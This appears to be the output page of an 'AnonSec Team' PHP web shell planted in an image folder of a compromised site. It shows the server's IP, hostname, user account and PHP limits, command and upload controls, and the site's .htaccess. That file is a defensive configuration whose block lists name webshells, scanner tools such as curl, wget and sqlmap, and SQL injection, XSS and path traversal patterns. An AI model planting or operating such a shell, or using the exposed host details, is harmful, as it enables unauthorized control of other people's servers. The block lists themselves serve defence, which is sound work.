AnonSec Team
Server IP : 124.109.2.77  /  Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF  |  Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF  |  Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) :  /home/cpctlp/domains/cpctlphp.com/public_html/admin/../fonts/../css/../js/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/../fonts/../css/../js/../.htaccess-
# Optimized .htaccess for CKEditor 4.10.1 compatibility
# Basic security settings
Options -Indexes
 

# Protect .htaccess file
<Files ".htaccess">
    Order allow,deny
    Deny from all
</Files>

# Protect files starting with dot (except well-known files)
<FilesMatch "^\.(?!well-known)">
    Order allow,deny
    Deny from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On

# Allow CKEditor essential files and directories
RewriteCond %{REQUEST_URI} ^/ckeditor/ [NC]
RewriteRule ^ckeditor/.*$ - [L]

# Allow common web assets for CKEditor
RewriteCond %{REQUEST_URI} \.(js|css|png|jpg|jpeg|gif|svg|ico|woff|woff2|ttf|eot|json)$ [NC]
RewriteRule ^.*$ - [L]

# Protection against specific malware and shells
RewriteCond %{REQUEST_URI} (ALFA_DATA|alfa|ALFA|alfacgiapi|alfaex) [NC]
RewriteRule .* - [F,L]

# Block dangerous shell files
RewriteCond %{REQUEST_URI} (shell|backdoor|webshell|c99|r57|wso|adminer|bypass|hack|exploit|malware) [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous directories (but allow CKEditor)
RewriteCond %{REQUEST_URI} (views|cache|shell|hack|bypass|logs) [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous file extensions (refined list)
RewriteCond %{REQUEST_URI} \.(phtml|php3|php4|php5|php7|phps|pl|py|cgi|sh|exe|bat|com|cmd|scr|vbs|jar|asp|aspx|jsp|cfm|rb|go|sql|db|bak|old|tmp|temp|orig)$ [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous HTTP methods
RewriteCond %{REQUEST_METHOD} ^(PUT|DELETE|TRACE|CONNECT|PATCH)$ [NC]
RewriteRule .* - [F,L]

# Block suspicious User-Agents (refined)
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} (wget|curl|libwww|python|nikto|scan|acunetix|netsparker|sqlmap|nmap|masscan|zmap|zgrab|shodan|censys) [NC]
RewriteRule .* - [F,L]

# Block common attack patterns
RewriteCond %{QUERY_STRING} (union.*select|insert.*into|delete.*from|drop.*table|create.*table|alter.*table) [NC]
RewriteRule .* - [F,L]

# Block XSS attempts
RewriteCond %{QUERY_STRING} (<script|<object|javascript:|vbscript:|onload=|onerror=) [NC]
RewriteRule .* - [F,L]

# Block file inclusion attempts
RewriteCond %{QUERY_STRING} (\.\.\/|\.\.\\|\.\.\%2f|\.\.\%5c) [NC]
RewriteRule .* - [F,L]

</IfModule>

# Security Headers
<IfModule mod_headers.c>
    Header always set X-Content-Type-Options nosniff
    Header always set X-Frame-Options DENY
    Header always set X-XSS-Protection "1; mode=block"
    Header always set Referrer-Policy "strict-origin-when-cross-origin"
    Header always set Permissions-Policy "geolocation=(), microphone=(), camera=()"
    
    # Allow CKEditor to work properly
    Header always set Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self'; media-src 'self'; object-src 'none'; child-src 'self'; frame-src 'self'; worker-src 'self'; manifest-src 'self';"
</IfModule>

# Compression for better performance
<IfModule mod_deflate.c>
    AddOutputFilterByType DEFLATE text/plain
    AddOutputFilterByType DEFLATE text/html
    AddOutputFilterByType DEFLATE text/xml
    AddOutputFilterByType DEFLATE text/css
    AddOutputFilterByType DEFLATE application/xml
    AddOutputFilterByType DEFLATE application/xhtml+xml
    AddOutputFilterByType DEFLATE application/rss+xml
    AddOutputFilterByType DEFLATE application/javascript
    AddOutputFilterByType DEFLATE application/x-javascript
    AddOutputFilterByType DEFLATE application/json
</IfModule>

# Cache control for CKEditor assets
<IfModule mod_expires.c>
    ExpiresActive On
    ExpiresByType text/css "access plus 1 month"
    ExpiresByType application/javascript "access plus 1 month"
    ExpiresByType image/png "access plus 1 month"
    ExpiresByType image/jpg "access plus 1 month"
    ExpiresByType image/jpeg "access plus 1 month"
    ExpiresByType image/gif "access plus 1 month"
    ExpiresByType image/svg+xml "access plus 1 month"
    ExpiresByType font/woff "access plus 1 month"
    ExpiresByType font/woff2 "access plus 1 month"
    ExpiresByType application/font-woff "access plus 1 month"
    ExpiresByType application/font-woff2 "access plus 1 month"
</IfModule>

# Protect specific sensitive files
<Files ~ "\.(htaccess|htpasswd|ini|log|sh|inc|bak|orig|tmp|temp|sql|db|conf|config)$">
    Order allow,deny
    Deny from all
</Files>

# Block directory browsing
<IfModule mod_autoindex.c>
    Options -Indexes
</IfModule>

# Prevent access to version control files
<FilesMatch "\.(git|svn|hg|bzr)">
    Order allow,deny
    Deny from all
</FilesMatch>

# Additional protection for WordPress if used
<IfModule mod_rewrite.c>
    RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC]
    RewriteCond %{REQUEST_URI} !^/wp-admin/admin-ajax\.php [NC]
    RewriteCond %{REQUEST_URI} !^/wp-admin/admin-post\.php [NC]
    RewriteCond %{REMOTE_ADDR} !^127\.0\.0\.1$
    RewriteCond %{REMOTE_ADDR} !^YOUR_IP_ADDRESS$
    RewriteRule ^.*$ - [F,L]
</IfModule>

AnonSec - 2021